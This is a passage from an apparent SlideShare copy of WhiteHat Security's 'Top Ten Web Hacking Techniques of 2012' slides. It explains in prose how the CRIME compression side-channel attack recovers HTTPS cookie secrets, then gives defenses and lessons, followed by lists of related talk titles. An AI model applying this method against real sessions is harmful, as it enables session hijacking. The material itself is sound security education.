     and watching how each one interacts with the encrypted
     data, attackers can deduce its contents.
•    An encrypted message is combined with attacker-controlled JavaScript
     that, letter by letter, performs a brute-force attack on the secret key.
     When it guesses the letter X as the first character of the cookie
     secret, the encrypted message will appear differently than an
     encrypted message that uses W or Y.
•    Once the first character is correctly guessed, the attack repeats the
     process again on the next character in the key until the remainder of
     the secret is deduced. The use of JavaScript isn't necessary, but does
     make the brute-force attack faster.


http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/

© 2013 WhiteHat Security, Inc.                                                  75
AT TAC K F L O W


"Basically, the attacker is running script in Evil.com. He forces the browser to open
requests to Bank.com by, for example, adding <img> tags with src pointing to
Bank.com," Rizzo said. "Each of those requests contains data from mixed sources.”

In these requests, attacker data and data produced by the browser is compressed and
mixed together. Those requests can include the path, which the attacker controls, the
browser's headers, which are public, and the cookie, which should be secret.

"The problem is that compression combines all
those sources together," Rizzo added. "The
attacker can sniff the packets and get the size
of the requests that are sent. By changing the
path, he could attempt to minimize the request
size, i.e., when the file name matches the
cookie."




  http://threatpost.com/en_us/blogs/crime-attack-uses-compression-ratio-tls-requests-side-channel-hijack-secure-sessions-091312

  © 2013 WhiteHat Security, Inc.                                                                                                  76
D EMO




   Video demo shows Github.com, Dropbox.com, and Stripe.com, when visited with
   a then-patched version of Chrome, succumbing to the CRIME attack. All three of
   disabled compression and no longer vulnerable.

https://www.youtube.com/watch?v=gGPhHYyg9r4
 © 2013 WhiteHat Security, Inc.                                                     77
D EF EN SE




Browser
Upgrade browsers to the latest version.




Server
Disable compression.




© 2013 WhiteHat Security, Inc.            78
WHAT WE’VE LEARNED




© 2013 WhiteHat Security, Inc.     79
L ESSO N S




• What’s old is new and improved: Many Web attack techniques from
  previous years, including those not appearing on the Top Ten, are
  constantly being improved. Researchers leverage new technology
  functionality and combine previously known techniques and produce
  combinations.
• 3-Peat: Encryption related attack techniques, by Juliano Rizzo and
  Thai Duong, took the #1 spot 3 years in a row (BEAST in 2011 and
  Padding Oracle in 2010). Web security community respects deep
  technical research.
• Attack and Researcher Diversity: In 2012 we saw attack techniques
  focused on encryption, HTML5 / client-side, mobile, infrastructure
  server-side, intranet, session state, etc. The range of expertise to keep
  up with all the new cutting-edge research is at the very least, a full-time
  job. And the researchers themselves are located across the globe.



© 2013 WhiteHat Security, Inc.                                              80
Thank you to…

 • All Web security researchers
 • Panel of Judges: Ryan Barnett, Robert Auger, Robert Hansen (CEO, Falling Rock
   Networks) Dinis Cruz, Jeff Williams (CEO, Aspect Security), Peleus Uhley, Romain
   Gaucher (Lead Researcher, Coverity), Giorgio Maone, Chris Wysopal, Troy
   Hunt, Ivan Ristic (Director of Engineering, Qualys), and Steve Christey (MITRE)
 • Everyone in the Web security community who assisted with voting




JEREMIAH GROSSMAN                       MATT JOHANSEN
Founder and CTO                         Head of the Threat Research Center

Twitter: @jeremiahg                     Twitter: @mattjay
Email: jeremiah@whitehatsec.com         Email: matt@whitehatsec.com

More Related Content

What's hot

PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
REST API 설계
REST API 설계REST API 설계
REST API 설계Terry Cho
 
[D2] java 애플리케이션 트러블 슈팅 사례 & pinpoint
[D2] java 애플리케이션 트러블 슈팅 사례 & pinpoint [D2] java 애플리케이션 트러블 슈팅 사례 & pinpoint
[D2] java 애플리케이션 트러블 슈팅 사례 & pinpoint NAVER D2
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
삶이편해지는_백엔드_개발자_지식.pdf
삶이편해지는_백엔드_개발자_지식.pdf삶이편해지는_백엔드_개발자_지식.pdf
삶이편해지는_백엔드_개발자_지식.pdfSeung kyoo Park
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityMikhail Egorov
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceFrans Rosén
 
Envoy 를 이용한 코드 배포 자동화
Envoy 를 이용한 코드 배포 자동화Envoy 를 이용한 코드 배포 자동화
Envoy 를 이용한 코드 배포 자동화Juwon Kim
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
 

What's hot (20)

Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJS
 
REST API 설계
REST API 설계REST API 설계
REST API 설계
 
[D2] java 애플리케이션 트러블 슈팅 사례 & pinpoint
[D2] java 애플리케이션 트러블 슈팅 사례 & pinpoint [D2] java 애플리케이션 트러블 슈팅 사례 & pinpoint
[D2] java 애플리케이션 트러블 슈팅 사례 & pinpoint
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
삶이편해지는_백엔드_개발자_지식.pdf
삶이편해지는_백엔드_개발자_지식.pdf삶이편해지는_백엔드_개발자_지식.pdf
삶이편해지는_백엔드_개발자_지식.pdf
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications security
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
 
Envoy 를 이용한 코드 배포 자동화
Envoy 를 이용한 코드 배포 자동화Envoy 를 이용한 코드 배포 자동화
Envoy 를 이용한 코드 배포 자동화
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
Vue.js
Vue.jsVue.js
Vue.js
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
Nginx Essential
Nginx EssentialNginx Essential
Nginx Essential
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
 

Viewers also liked

5 Proven Strategies for Working Capital
5 Proven Strategies for Working Capital5 Proven Strategies for Working Capital
5 Proven Strategies for Working CapitalTradeshift
 
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016SecuRing
 
Cyber war a threat to indias homeland security 2015
Cyber war a threat to indias homeland security 2015Cyber war a threat to indias homeland security 2015
Cyber war a threat to indias homeland security 2015Ajay Serohi
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooBinu Ramakrishnan
 
Owasp summit 2017
Owasp summit 2017 Owasp summit 2017
Owasp summit 2017 Dinis Cruz
 
National cyber security policy 2013
National cyber security policy  2013National cyber security policy  2013
National cyber security policy 2013M P Keshava
 
Indian perspective of cyber security
Indian perspective of cyber securityIndian perspective of cyber security
Indian perspective of cyber securityAurobindo Nayak
 
Best Practices in Auditing ISO/IEC 27001
Best Practices in Auditing ISO/IEC 27001Best Practices in Auditing ISO/IEC 27001
Best Practices in Auditing ISO/IEC 27001PECB
 
Best practices and Government role in Cyber Security
Best practices and Government role in Cyber Security Best practices and Government role in Cyber Security
Best practices and Government role in Cyber Security USAID CEED II Project Moldova
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Jeremiah Grossman
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical HackingNeel Kamal
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern timesjeshin jose
 
Cyber security presentation
Cyber security presentationCyber security presentation
Cyber security presentationBijay Bhandari
 
Cybercrime.ppt
Cybercrime.pptCybercrime.ppt
Cybercrime.pptAeman Khan
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its typesSai Sakoji
 
Cyber crime and security ppt
Cyber crime and security pptCyber crime and security ppt
Cyber crime and security pptLipsita Behera
 

Viewers also liked (20)

5 Proven Strategies for Working Capital
5 Proven Strategies for Working Capital5 Proven Strategies for Working Capital
5 Proven Strategies for Working Capital
 
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
 
Cyber war a threat to indias homeland security 2015
Cyber war a threat to indias homeland security 2015Cyber war a threat to indias homeland security 2015
Cyber war a threat to indias homeland security 2015
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at Yahoo
 
Hacking
HackingHacking
Hacking
 
Owasp summit 2017
Owasp summit 2017 Owasp summit 2017
Owasp summit 2017
 
National cyber security policy 2013
National cyber security policy  2013National cyber security policy  2013
National cyber security policy 2013
 
Indian perspective of cyber security
Indian perspective of cyber securityIndian perspective of cyber security
Indian perspective of cyber security
 
Ethical hacking presentation
Ethical hacking presentationEthical hacking presentation
Ethical hacking presentation
 
Best Practices in Auditing ISO/IEC 27001
Best Practices in Auditing ISO/IEC 27001Best Practices in Auditing ISO/IEC 27001
Best Practices in Auditing ISO/IEC 27001
 
Best practices and Government role in Cyber Security
Best practices and Government role in Cyber Security Best practices and Government role in Cyber Security
Best practices and Government role in Cyber Security
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern times
 
Ethical hacking presentation
Ethical hacking presentationEthical hacking presentation
Ethical hacking presentation
 
Hacking ppt
Hacking pptHacking ppt
Hacking ppt
 
Cyber security presentation
Cyber security presentationCyber security presentation
Cyber security presentation
 
Cybercrime.ppt
Cybercrime.pptCybercrime.ppt
Cybercrime.ppt
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its types
 
Cyber crime and security ppt
Cyber crime and security pptCyber crime and security ppt
Cyber crime and security ppt
 

Similar to Top Ten Web Hacking Techniques of 2012

Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Jeremiah Grossman
 
White paper screen
White paper screenWhite paper screen
White paper screeneltincho89
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developersJohn Ombagi
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
XST - Cross Site Tracing
XST - Cross Site TracingXST - Cross Site Tracing
XST - Cross Site TracingMagno Logan
 
Web Application Scanning 101
Web Application Scanning 101Web Application Scanning 101
Web Application Scanning 101Sasha Nunke
 
Top 10 Web Hacks 2013
Top 10 Web Hacks 2013Top 10 Web Hacks 2013
Top 10 Web Hacks 2013Matt Johansen
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdfssuser01066a
 
Hacking intranet websites
Hacking intranet websitesHacking intranet websites
Hacking intranet websitesshehab najjar
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotJeremiah Grossman
 
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...RootedCON
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APIKevin Hakanson
 
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Stormpath
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 

Similar to Top Ten Web Hacking Techniques of 2012 (20)

Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
 
White paper screen
White paper screenWhite paper screen
White paper screen
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developers
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
XST - Cross Site Tracing
XST - Cross Site TracingXST - Cross Site Tracing
XST - Cross Site Tracing
 
Web Application Scanning 101
Web Application Scanning 101Web Application Scanning 101
Web Application Scanning 101
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
 
Top 10 Web Hacks 2013
Top 10 Web Hacks 2013Top 10 Web Hacks 2013
Top 10 Web Hacks 2013
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
 
4.Xss
4.Xss4.Xss
4.Xss
 
Hacking intranet websites
Hacking intranet websitesHacking intranet websites
Hacking intranet websites
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security Forgot
 
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography API
 
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 

More from Jeremiah Grossman

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterJeremiah Grossman
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorJeremiah Grossman
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryJeremiah Grossman
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensJeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideJeremiah Grossman
 
Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Jeremiah Grossman
 
Ransomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowRansomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowJeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage YearsJeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage YearsJeremiah Grossman
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Jeremiah Grossman
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015Jeremiah Grossman
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesJeremiah Grossman
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedJeremiah Grossman
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportJeremiah Grossman
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)Jeremiah Grossman
 
WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]Jeremiah Grossman
 
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"Jeremiah Grossman
 

More from Jeremiah Grossman (20)

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matter
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare Sector
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare Industry
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers Guide
 
Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?
 
Ransomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowRansomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to Know
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security Guarantees
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report Explained
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics Report
 
Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser Botnet
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)
 
WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]
 
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
 

Recently uploaded

IESVE for Early Stage Design and Planning
IESVE for Early Stage Design and PlanningIESVE for Early Stage Design and Planning
IESVE for Early Stage Design and PlanningIES VE
 
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)Julian Hyde
 
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo DiehlFuture Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo DiehlPeter Udo Diehl
 
Intelligent Gimbal FINAL PAPER Engineering.pdf
Intelligent Gimbal FINAL PAPER Engineering.pdfIntelligent Gimbal FINAL PAPER Engineering.pdf
Intelligent Gimbal FINAL PAPER Engineering.pdfAnthony Lucente
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
 
Enterprise Security Monitoring, And Log Management.
Enterprise Security Monitoring, And Log Management.Enterprise Security Monitoring, And Log Management.
Enterprise Security Monitoring, And Log Management.Boni Yeamin
 
Demystifying gRPC in .Net by John Staveley
Demystifying gRPC in .Net by John StaveleyDemystifying gRPC in .Net by John Staveley
Demystifying gRPC in .Net by John StaveleyJohn Staveley
 
Transforming The New York Times: Empowering Evolution through UX
Transforming The New York Times: Empowering Evolution through UXTransforming The New York Times: Empowering Evolution through UX
Transforming The New York Times: Empowering Evolution through UXUXDXConf
 
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxWSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxJennifer Lim
 
AI presentation and introduction - Retrieval Augmented Generation RAG 101
